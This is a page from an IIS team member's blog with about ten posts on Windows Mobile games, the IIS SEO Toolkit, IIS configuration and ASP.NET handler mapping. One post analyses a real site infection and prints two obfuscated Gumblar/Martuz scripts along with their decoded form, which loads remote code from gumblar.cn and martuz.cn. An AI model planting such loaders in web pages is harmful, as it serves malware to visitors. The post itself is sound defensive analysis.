Posts
  • CarlosAg Blog

    Backgammon and Connect4 for Windows Mobile

    • 5 Comments

    During the holidays my wife and I went back to visit our families in Mexico City where we are originally from. Again, during the flights I had enough spare time to build a couple of my favorite games, Backgammon and Connect4.

    I've already built both games for Windows using Visual Basic 5 almost 11 years ago but as you would imagine I was far from feeling proud of the implementation. So this time I started from scratch and ended up with what I think are better versions of them (still not the best code, but pretty decent for just a few hours of coding). In fact the AI for the Backgammon version is a bit better and the Connect4 is faster and more suited for a Mobile device.

    You can go with your PDA/Smartphone to http://www.carlosag.net/mobile/ to install both games or just click the images below to take you to the install page of each of them. Enjoy and feel free to add any feedback/features as comments to this blog post.

    The one thing I learned during the development of these versions is that you do want to download the Windows Mobile 6 SDK if you are going to target that version (which is what my cell phone has), since it will add new Visual Studio 2005 Project Templates and new Emulator images which will help you a lot. For example I was trying to use buttons in my forms, and testing it in Pocket PC worked, but as soon as I tried them in my cell phone it crashed with a NotSupportedException. When I installed the SDK and switched to target that platform, Visual Studio immediately warned me that my platform didn't supported buttons which was great.

    Bottom line I'm more and more amazed of how easy it is to build games in Windows Mobile and the things you can achieve with both Windows Mobile and the .NET Compact Framework.

  • CarlosAg Blog

    Announcing: IIS SEO Toolkit v1.0.1

    • 5 Comments

    Last week we released a refresh for the IIS Search Engine Optimization (SEO) Toolkit v1.0. This version is a minor update that includes fixes for all the important bugs reported in the IIS.NET SEO Forum.

    Some of the fixes included in this version are:

    1. Pages sending the XHTML content type 'application/xhtml+xml' are not parsed correctly as HTML causing their links and violations to be empty.
    2. Report Analysis fails if the META tags include certain characters.
    3. <style> tag is not parsed correctly if it is empty causing Invalid Markup violations to be flagged incorrectly.
    4. Memory is not released when the "Store Copies of analyzed web pages locally" button is unchecked.
    5. HTML with leading empty lines and doctype fails to parse correctly causing their links and violations to be empty.
    6. Internal Link criteria option of "host: <sitename> and subdomains (*.<sitename>)" fails to work as expected under certain configurations.
    7. System.NullReferenceException when content attribute is misisng in Meta tag
    8. Windows authentication does not work with servers configured with NTLM or Kerberos only challenge.
    9. External META tags are stored in the report making it cumbersome to use the important ones.
    10. Several localization related bugs.
    11. DTD error when navigating to the Sitemap and Sitemap Index User Interface.
    12. And others…

    This release is compatible with v1.0 RTM and it will upgrade if already installed. So go ahead and install the new version using Web Platform Installed by clicking: http://go.microsoft.com/?linkid=9695987

     

    Learn more about it at: http://www.iis.net/expand/SEOToolkit

  • CarlosAg Blog

    IIS SEO Toolkit and W3C Validation Service

    • 4 Comments

    One thing that I’ve been asked several times about the SEO Toolkit is if it does a full standards validation on the markup and content that is processed, and if not, to add support for more comprehensive standards validation, in particular XHTML and HTML 4.01. Currently the markup validation performed by the SEO Toolkit is really simple, its main goal is to make sure that the markup is correctly organized, for example that things like <b><i>Test</b></i> are not found in the markup, the primary reason is to make sure that basic blocks of markup are generally "easy" to parse by Search Engines and that the semantics will not be terribly broken if a link, text or style is not correctly closed (since all of them would affect SEO).

    So the first thing I would say is that we have heard the feedback and are looking at what we could possibly add in future versions, however why wait, right?

    One thing that many people do not realize is that the SEO Toolkit can be extended to add new violations, new metadata and new rules to the analysis process and as such during a demo I gave a few weeks ago I decided to write a sample on how to consume the online W3C Markup Validation Service from the SEO Toolkit.

    Download

    You can download the SEOW3Validator including the source code at http://www.carlosag.net/downloads/SEOW3Validator.zip.

    How to install it

    To run it you just need to:

    1. Unzip the contents in a folder.
    2. Install the SEOW3Validator.dll assembly in the GAC:
      1. Open a Windows Explorer window and navigate to c:\Windows\assembly
      2. Drag and Drop the SEOW3Validator.dll to the c:\Windows\assembly explorer window.
      3. Alternatively you can just run gacutil.exe /i SEOW3Validator.dll, usually located at C:\Program Files\Microsoft SDKs\Windows\v6.0A\bin or v7A.
      4. If you have problems with this, you could try just copying the assembly to the GAC (copy SEOW3Validator.dll c:\Windows\assembly\GAC_MSIL\SEOW3Validator\1.0.0.0__995ee9b8fa017847\SEOW3Validator.dll)
    3. Register the moduleProvider in Administration.config: In an elevated prompt open C:\Windows\System32\Inetsrv\config\Administration.config and add the following line right inside the <moduleProviders> right before closing the </moduleProviders>:
    4.   <add name="SEOW3Validator" 
             type
      ="SEOW3Validator.SEOW3ValidatorModuleProvider, SEOW3Validator, Version=1.0.0.0, Culture=neutral, PublicKeyToken=995ee9b8fa017847" />

    You should be able to now run the SEO Toolkit just as before but now you will find new violations, for example in my site I get the ones below. Notice that there are a new set of violations like W3 Validator – 68, etc, and all of them belong to the W3C category. (I would have liked to have better names, but the way the W3 API works is not really friendly for making this any better).

    SampleValidatorResults

    And when double clicking any of those results you get the details as reported by the W3 Validation Service:

    SampleValidatorDetails

    The Code

    The code is actually pretty simple, the main class is called SEOW3ValidatorExtension that derives from CrawlerModule and overrides the Process method to call the W3C Validation service sending the actual markup in the request, this means that it does not matter if your site is an Intranet or in the Internet, it will work; and for every warning and error that is returned by the Validator it will add a new violation to the SEO report.

    The code looks like this:

        W3Validator validator = new W3Validator();
       
    W3ValidatorResults results = validator.Validate(context.UrlInfo.FileName, 
           
    context.UrlInfo.ContentTypeNormalized, 
           
    context.UrlInfo.Response);

       
    foreach (W3ValidatorWarning warning in results.Warnings) {
           
    context.UrlInfo.AddViolation(CreateWarning(warning));
       
    }

       
    foreach (W3ValidatorError error in results.Errors) {
           
    context.UrlInfo.AddViolation(CreateError(error));
       
    }

     

     

     

    I created a helper class W3Validator that basically encapsulates the consumption of the W3C Validation Service, the code is far from what I would like it to be however there are some "interesting" decisions on the way the API is exposed, I would have probably designed the service differently and not return the results formatted in HTML when this is actually an API/WebService that can be presented somewhere else than a browser. So a lot of the code is to just re-format the results to look "decent", but to be honest I did not want to spend too much time on it so everything was put together quite quickly. Also, if you look at the names I used for violations, I did not want to hard-code specific Message IDs and since the Error Message was different for all of them even within the same Message ID, it was not easy to provide better messages. Anyway, overall it is pretty usable and should be a good way to do W3 Validation.

    Note that one of the cool things you get for free is that since these are stored as violations, you can then re-run the report and use the Compare Report feature to see the progress while fixing them. Also, since they are stored as part of the report you will not need to keep running the validator over and over again but instead just open it and continue looking at them, as well as analyzing the data in the Reports and Queries, and be able to export them to Excel, etc.

    Hopefully this will give you a good example on some of the interesting things you can achieve with the SEO Toolkit and its extensibility.

  • CarlosAg Blog

    Free Sudoku Game for Windows

    • 4 Comments

    A couple of years ago a friend of mine introduced me to a game called Sudoku, and immediately I loved it. As any good game its rules are very simple, basically you have to lay out the numbers from 1 to 9 horizontally in a row without repeating them, while at the same time you have to layout the same 1 to 9 numbers vertically in a column, and also within a group (a 3x3 square).

    After that, every time I had to take a flight I got addicted to buying a new puzzles magazine that would entertain me for the flight. On December 2006 while flying to Mexico I decided to change the tradition and instead build a simple Sudoku game that I could play any time I felt like doing it without having to find a magazine store and that turned into this simple game. It is not yet a great game since I haven't had time to finalize it, but I figure I would share it anyway in case someone finds it fun.

    Click Here to go to the Download Page

    Sudoku

  • CarlosAg Blog

    Canonical Formats and Query Strings - IIS SEO Toolkit

    • 4 Comments

    Today somebody was running the IIS SEO Toolkit and using the Site Analysis feature flagged a lot of violations about "The page contains multiple canonical formats.". The reason apparently is that he uses Query String parameters to pass contextual information or other information between pages. This of course yield the question: Does that mean in general query strings are bad news SEO wise?

    Well, the answer is not necessarily.

    I will start by clarifying that this violation in Site Analysis means that our algorithm detected that those two URL's look like the same content, note that we make no assumptions based on the URL (including Query String parameters). This kind of situation is bad for a couple of reasons:

    1. Based on the fact they look like the same page Search Engines will probably choose one of them and index it as the real content and will discard the other one. The problem is that you are leaving this decision to Search Engines which means some might choose the wrong version and end up using the one with Query String parameters instead of the clean one (not-likely though). Or even worse they might end up indexing both of them as if they were different.
    2. When other Web sites look at your content and add links to it, some of them might end up using the URL with different Query String parameters and some of them not. What this means is that the organic linking will not give you the benefits that you would if this was not the case. Remember Search Engines add you "extra" points when somebody external references your page but now you'll be splitting the earnings with "two pages" instead of a single canonical form.

    Query String by themselves do not pose a terrible threat to SEO, most modern Search Engines deal OK with Query Strings, however its the organic linking and the potential abuse of Query Strings that could give you headaches.

    Remember, Search Engines should make no assumptions based on the fact it is a single "page" that serves tons of content through a single Absulte Path and the use of Query Strings. This is typical in many cases such as when using index.php, where pretty much every page on the site is served by the same resource and just using variations of Query Strings or path information.

     

    So what should I do?

    Well, there are several things you could do, but probably one of the easiest is to just tell Search Engines (more specifically crawlers or bots) to not index pages that have the different Query String variations that really are meant only for the application to pass state and not to specify different content. This can be done using the Robots Exclusion Protocol and use the wildcard matching to specify to not follow any URL's that contain a '?'. Note that you should make sure you are not blocking URL's that actually are supposed to be indexed. For this you can use the Site Analysis feature to run it again and it will flag an informational message for each URL that is not visited due to the robots exclusion file.

    User-agent: *
    Disallow: /*?

     

    In summary, try to keep canonical formats yourself, don't leave any guesses to Search Engines cause some of them might get it wrong. There are new ways of specifying the canonical form in your markup but it is "very recent" (as in 2009) and some Search Engines do not support it (I believe the top three do, though) using the new rel="canonical":

    <link rel="canonical" href="http://www.my-site.com/my-canonical-url" />

    In the Beta 2 version of IIS SEO Toolkit we will support this tag and have better detection of this canonical issues. So stay tuned.

    Other ways to solve this is to use URL Rewrite so that you can easily redirect or rewrite your URL's to get rid of the Query Strings and use more SEO friendly URL's.

  • CarlosAg Blog

    Announcing: IIS SEO Toolkit v1.0 release

    • 3 Comments

    Today we are announcing the final release of the IIS Search Engine Optimization (SEO) Toolkit v1.0. This version builds upon the Beta 1 and Beta 2 versions and is 100% compatible with those versions so any report you currently have continues to work in the new version. The new version includes a set of bug fixes and new features such as:

    1. Extensibility. In this version we are opening a new set of API's to allow you to develop extensions for the crawling process, including the ability to augment the metadata in the report with your own, extend the set of tasks provided in the Site Analysis and Sitemaps User Interface and more. More on this on a upcoming post.
    2. New Reports. Based on feedback we added a Redirects summary report in the Links section as well as a new Link Depth report that allows you to easily know which pages are the "most hidden pages" in your site, or in other words if a user landed at your sites home page, "how many clicks does he need to do to reach a particular page".
    3. New Routes Query. We added a new type of Query called Routes. This is the underlying data that powers the "Link Depth" report mentioned above, however it is also exposed as a new query type so that you can create your own queries to customize the Start page and any other kind of things, like filtering, grouping, etc.
    4. New option to opt-out from keeping a local cache of files. We added a new switch in the "Advanced Settings" of the New Analysis dialog to disable the option of keeping the files stored locally. This allows you to run a report which runs faster and that consumes a lot less disk space than when keeping the files cached. The only side effect is that you will not be able to get the "Content" tab and the contextual position of the links as well as the Word Analysis feature. Everything else continues to work just as any other report.
    5. HTML Metadata is now stored in the Report. By leveraging the Extensibility mentioned in bullet 1, the HTML parser now stores all the HTML META tags content so that you can later use them to write your own queries, whether to filter, group data or just export it, this gives you a very interesting set of options if you have any metadata like Author, or any custom.
    6. Several Bug Fixes:
      1. Internal URLs linked by External URLs now are also included in the crawling process.
      2. Groupings in queries should be case sensitive
      3. Show contextual information (link position) in Routes
      4. The Duplicate detection logic should only include valid responses (do not include 404 NOT Found, 401, etc)
      5. Canonical URLs should support sub-domains.
      6. Several Accessibility fixes. (High DPI, Truncation in small resolutions, Hotkeys, Keyboard navigation, etc).
      7. Several fixes for Right-To-Left languages. (Layout and UI)
      8. Help shortcuts enabled.
      9. New Context Menus for Copying content
      10. Add link position information for Canonical URLs
      11. Remove x-javascript validation for this release
      12. Robots algorithm should be case sensitive
      13. many more

    This version can upgrade both Beta 1 and Beta 2 version so go ahead and try it and PLEASE provide us with feedback and any additional things you would like to see for the next version at the SEO Forum in the IIS Web site.

    Click here to install the IIS SEO Toolkit.

  • CarlosAg Blog

    IIS SEO Tip - Do not stress your server, limit the number of concurrent requests

    • 3 Comments

    The other day somebody ask me if there was a way to limit the amount of work that Site Analysis in IIS SEO Toolkit would cause to the server. This is interesting for a couple of reasons,

    • You might want to reduce the load that Site Analysis cause to your server at any given time
    • You might have a Denial-of-service detection system such as our Dynamic IP Restrictions IIS module that will start failing requests based on number of requests in a certain amount of time
    • Or If you like me have to go through a Proxy and it has a configured limit of number of requests per minute you are allowed to issue

    In Beta 1 we do not support the Crawl-delay directive in the Robots exclusion protocol; in future versions we will look at adding support this setting. The good news is that in Beta 1 we do have a configurable setting that can help you achieve this goals called Maximum Number of Concurrent Requests that you can configure.

    To set it:

    1. Go to the Site Analysis Reports page
    2. Select the option "Edit Feature Settings..." as show in the next image
      EditFeatureSettings
    3. In the "Edit Feature Settings" dialog you will see the Maximum Number of Concurrent Requests option that you can set to any value from 1 to 16. The default value is 8 which means at any given time we will issue 8 requests to the server.
      MaxConcurrentRequests
  • CarlosAg Blog

    Finding malware in your Web Site using IIS SEO Toolkit

    • 3 Comments

    The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.

    My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. He downloaded the HTML pages and tried looking for anything suspicious on them, however he was not able to find anything. My friend then went back to his Hosting provider and mentioned the fact that they were not able to find anything problematic and that if it could be something with the server configuration, to which they replied in a sarcastic way that it was probably ignorance on his Web site designer.

    Enter IIS SEO Toolkit

    So of course I decided the first thing I would do is to start by crawling the Web site using Site Analysis in IIS SEO Toolkit. This gave me a list of the pages and resources that his Web site would have. First thing I knew is usually malware hides either in executables or scripts on the server, so I started looking for the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.

    img01

    I was surprised to no found a single executable and to only see two very simple javascripts which looked not like malware in any way. So based on previous knowledge I knew that malware in HTML pages usually is hidden behind a funky looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for those HTML pages which contain the word eval and contain the word unescape. I know there are valid scripts that could include those features since they exist for a reason but it was a good way to get scoping the pages.

    Gumblar and Martuz.cn Malware on sight

    img02

    After running the query as shown above, I got a set of HTML files which all gave a status code 404 – NOT FOUND. Double clicking in any of them and looking at the HTML markup content made it immediately obvious they were malware infected, look at the following markup:

    <HTML>
    <HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD>
    <script language=javascript><!-- 
    (function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
    -->
    </script><script language=javascript><!-- 
    (function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
     
    --></script><BODY>
    <H1>Not Found</H1>
    The requested document was not found on this server.
    <P>
    <HR>
    <ADDRESS>
    Web Server at **********
    </ADDRESS>
    </BODY>
    </HTML>

    Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.

    For those of you like me that do not particularly enjoy reading encoded Javascript what these two scripts do is just unescape the funky looking string and then execute it. I have un-encoded the script that would get executed and showed it below just to show case how this malware works. Note how they special case a couple browsers including Chrome to request then a particular script that will cause the real damage.

    var a = "ScriptEngine", 
       
    b = "Version()+", 
       
    j = "", 
       
    u = navigator.userAgent; 
    if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) { 
       
    zrvzts = "A"; 
       
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;"); 
       
    document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>"); 
    }

    And:

    var a="ScriptEngine",
       
    b="Version()+",
       
    j="",u=navigator.userAgent;
    if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
       
    zrvzts="A";
       
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//martuz.cn/vid/?id="+j+"><\/script>");
    }

    Notice how both of them end up writing the actual malware script living in martuz.cn and gumblar.cn.

    Final data

    Now, this clearly means they are infected with malware, and it clearly seems that the problem is not in the Web Application but the infection is in the Error Pages that are being served from the Server when an error happens. Next step to be able to guide them with more specifics I needed to determine the Web server that they were using, to do that it is as easy as just inspecting the headers in the IIS SEO Toolkit which displayed something like the ones shown below:

    Accept-Ranges: bytes
    Content-Length: 2570
    Content-Type: text/html
    Date: Sat, 20 Jun 2009 01:16:23 GMT
    Last-Modified: Sun, 17 May 2009 06:43:38 GMT
    Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

    With a big disclaimer that I know nothing about Apache, I then guided them to their .htaccess file and the httpd.conf file for ErrorDocument and that would show them which files were infected and if it was a problem in their application or the server.

    Case Closed

    Turns out that after they went back to their Hoster with all this evidence, they finally realized that their server was infected and were able to clean up the malware. IIS SEO Toolkit helped me quickly identify this based on the fact that is able to see the Web site with the same eyes as a Search Engine would, following every link and letting me perform easy queries to find information about it. In future versions of IIS SEO Toolkit you can expect to be able to find this kind of things in a lot simpler ways, but for Beta 1 for those who cares here is the query that you can save in an XML file and use "Open Query" to see if you are infected with these malware.

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
     
    <filter>
       
    <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
        <
    expression field="FileContents" operator="Contains" value="unescape" />
        <
    expression field="FileContents" operator="Contains" value="eval" />
      </
    filter>
     
    <displayFields>
       
    <field name="URL" />
        <
    field name="StatusCode" />
        <
    field name="Title" />
        <
    field name="Description" />
      </
    displayFields>
    </query>
  • CarlosAg Blog

    Extending the IIS Configuration System using COM

    • 3 Comments

    Today I was going to post about extending the IIS Configuration, in particular about a feature that not everybody knows that allows you to extend the IIS Configuration System using dynamic code. What this means is that instead of hard-coding the configuration using XML in a .config file, your configuration can be provided by a COM object that implements IAppHostPropertyExtension, IAppHostElementExtension and IAppHostMethodExtension.

    Then, just to make sure I was not repeating what somebody else already said I searched for this in live.com (Worth to say, excellent results, first hit is the documentation of the interface, second hit is an excellent article in iis.net).

    So instead of repeating what you can already find in those places in IIS.NET I decided to not blog about it in details, but instead mention some of the things that are not specified in these places.

    This dynamic configuration is great and offers lots of interesting features since it allows you to expose any random code that can immediately be accessed through all of our configuration API's, including Microsoft.Web.Administration, AHADMIN, etc, giving your end-user a common programming paradigm, in fact this also means that its immediately accessible to the UI API's and even to the new Configuration Editor in the Admin Pack.

    Another interesting benefit is that through these API's your code can be called remotely so that it can be scripted to manage the machines remotely without the need to write any serialization or complex remote infrastructure (restrictions might apply).

    However, one thing that is also important to mention is that these dynamic configuration extensions are only available for administration tools, meaning you cannot access this extensions from the worker process by default. To clarify, you cannot use the Worker Process configuration instance to invoke these extensions since the worker process specifically disables the ability to call them in its configuration instance. However, if you create your own instance of Microsoft.Web.Administration.ServerManager (which requires you to be running in Full Trust) you will be able. You can also create your own instance of Microsoft.ApplicationHost.AdminManager and you will be able to access them. However in both cases this will only work if your an Administrator in the machine or have read ACL's for ApplicationHost.config file (which by default is only readable by Administrators). This is why methods like Microsoft.Web.Administration.WebConfiigrationManager::GetSection (and CoGetObject for AHADMIN) are provided so you don't run into these issues when developing Web Applications and are still able to read configuration sections for your worker process without requiring administrative privileges (in MWA provided you are either are in Full Trust or the section definition marks it as requirePermission=false).

    To understand better some scenarios its worth to mention that In IIS 7.0 we actually use these API's to provide access to runtime information in an easy way and other tasks, for example, to query the state of a Site, to Recycle an Application Pool, to assign an SSL certificate to a binding, to stop a Site, are all provided through this mechanism. If you want to see all the things we do this way just open %windir%\System32\Inetsrv\config\schema\rscaext.xml where all of our Web Server extensions are declared. Our own FTP Server for IIS 7.0 uses the same mechanism for things like querying Sessions, and other cool stuff.

    Anyway, feel free to give the IIS.NET article a good read, its quite good.

    http://www.iis.net/articles/view.aspx/IIS7/Extending-IIS7/Extending-IIS7-Configuration/Configuration-Extensibility

  • CarlosAg Blog

    Mapping a different file extension for ASPX Pages in IIS 7.0

    • 3 Comments

    Today I read a question in one of the IIS.NET forums - although I'm not sure if this is what they really wanted to know - I figured it might be useful to understand how to do this anyway. Several times users does not like exposing their ASP.NET pages using the default .aspx file extension (sometimes because of legacy reasons, where they try to minimize the risk of generating broken links when moving from a different technology, to preserve the validity of previous search-engines-indexes and sometimes for the false sense of security or whatever).

    Regardless of why, the bottom line, to map a different file extension so they behave just like any other ASP.NET page requires you to add a couple of entries in configuration, especially if you want those to be able to work in both Pipeline Modes "Classic and Integrated".

    For this exercise lets assume you want to assign the file extension .IIS so that they get processed as ASPX pages and that you only want this to be applicable for Default Web Site and its applications.

    The following Web.Config file will enable this to work for both Pipeline Modes:

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
       
    <system.webServer>
           
    <handlers>
               
    <add name="ASPNETLikeHandler-Classic" path="*.iis" verb="GET,HEAD,POST,DEBUG" modules="IsapiModule" scriptProcessor="C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv2.0,bitness32" />
                <
    add name="ASPNETLikeHandler" path="*.iis" verb="GET,HEAD,POST,DEBUG" type="System.Web.UI.PageHandlerFactory" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" />
            </
    handlers>
           
    <validation validateIntegratedModeConfiguration="false" />
        </
    system.webServer>
       
    <system.web>
           
    <compilation>
               
    <buildProviders>
                   
    <add extension=".iis" type="System.Web.Compilation.PageBuildProvider" />
                </
    buildProviders>
           
    </compilation>
           
    <httpHandlers>
               
    <add path="*.iis" type="System.Web.UI.PageHandlerFactory" verb="*" />
            </
    httpHandlers>
       
    </system.web>
    </configuration>

    The following command lines uses AppCmd.exe to enable this for both Pipeline Modes and basically generate the .config file above.


    echo To make it work in integrated mode
    appcmd.exe set config "Default Web Site" -section:system.webServer/handlers /+"[name='ASPNETLikeHandler',path='*.iis',verb='GET,HEAD,POST,DEBUG',type='System.Web.UI.PageHandlerFactory',modules='ManagedPipelineHandler',requireAccess='Script',preCondition='integratedMode']"
    appcmd.exe set config "Default Web Site" -section:system.web/compilation /+"buildProviders.[extension='.iis',type='System.Web.Compilation.PageBuildProvider']"

    echo To make it work in classic mode
    appcmd.exe set config "Default Web Site" -section:system.webServer/handlers /+"[name='ASPNETLikeHandler-Classic',path='*.iis',verb='GET,HEAD,POST,DEBUG',modules='IsapiModule',scriptProcessor='%windir%\Microsoft.NET\Framework\v2.0.50727\aspnet_isapi.dll',requireAccess='Script',preCondition='classicMode,runtimeVersionv2.0,bitness32']"

    appcmd.exe set config "Default Web Site" -section:system.web/httpHandlers /+"[path='*.iis',type='System.Web.UI.PageHandlerFactory',verb='*']"

    appcmd.exe set config "Default Web Site" -section:system.web/compilation /+"buildProviders.[extension='.iis',type='System.Web.Compilation.PageBuildProvider']"

    appcmd.exe set config "Default Web Site" -section:system.webServer/validation /validateIntegratedModeConfiguration:"False"

    So what does this actually do?

    Lets actually describe the AppCmd.exe lines since it breaks nicely the different operations.

    1. Integrated Mode. When running in Integrated mode conceptually only the IIS Pipeline gets executed and not the ASP.NET pipeline, this means that the HttpHandlers section (in system.web) is actually not used at all.
      1. So just by adding a new handler (ASPNETLikeHandler above) to the System.WebServer/Handlers will cause IIS to see this extension and correctly execute the page. Note that we use the preCondition attribute to tell IIS that this handler should only be used when we are running in an Integrated Pipeline Application Pool.
      2. The second line only tells the ASP.NET compilation infrastructure how to deal with files with this extension so that it can compile it as needed.
    2. Classic Mode. In classic mode the ASP.NET pipeline keeps running as previous versions of IIS as a simple ISAPI and the new IIS pipeline gets executed as well, this means that we first need to tell IIS to route the request to ASP.NET ISAPI and then we need to tell ASP.NET how to handle this extension as well by using the system.web/httpHandlers to process the request.
      1. The first line adds a handler (ASPNETLikeHandler-Classic above) to IIS so that IIS correctly routes this request to the aspnet_isapi.dll. Note that in this case we also use the preCondition attribute to tell IIS that this only applies when running in an Application Pool in classic mode, furthermore we also use it to specify that it should only be used in an Application Pool running in 32 bit mode and that is using version 2.0 of the runtime. If you wanted to support also 64 bit application pools you would add another handler pointing to the 64bit version of aspnet_isapi.dll in Framework64 folder and use bitness64 instead.
      2. The second line tells ASP.NET that the .iis extension is handled by the PageHandlerFactory, so that the ASP.NET pipeline understands what to do when a file with the .iis extension is requested.
      3. Again, just as 2 in the Integrated Mode case we need to tell the ASP.NET compilation infrastructure how to deal with this extension.
      4. Finally since we are adding a system.web/httpHandler entry and to make sure that this will not break when someone changes the App pool to integrated mode we tell IIS to "not complain" if we get run in Integrated mode since we also included the handler in the IIS sections in the right way.

    Hopefully this helps understanding a bit how to re-map extensions to ASP.NET extensions, and in doing that learn a bit more about preConditions, Handlers and AppCmd.

Page 4 of 10 (93 items) «23456»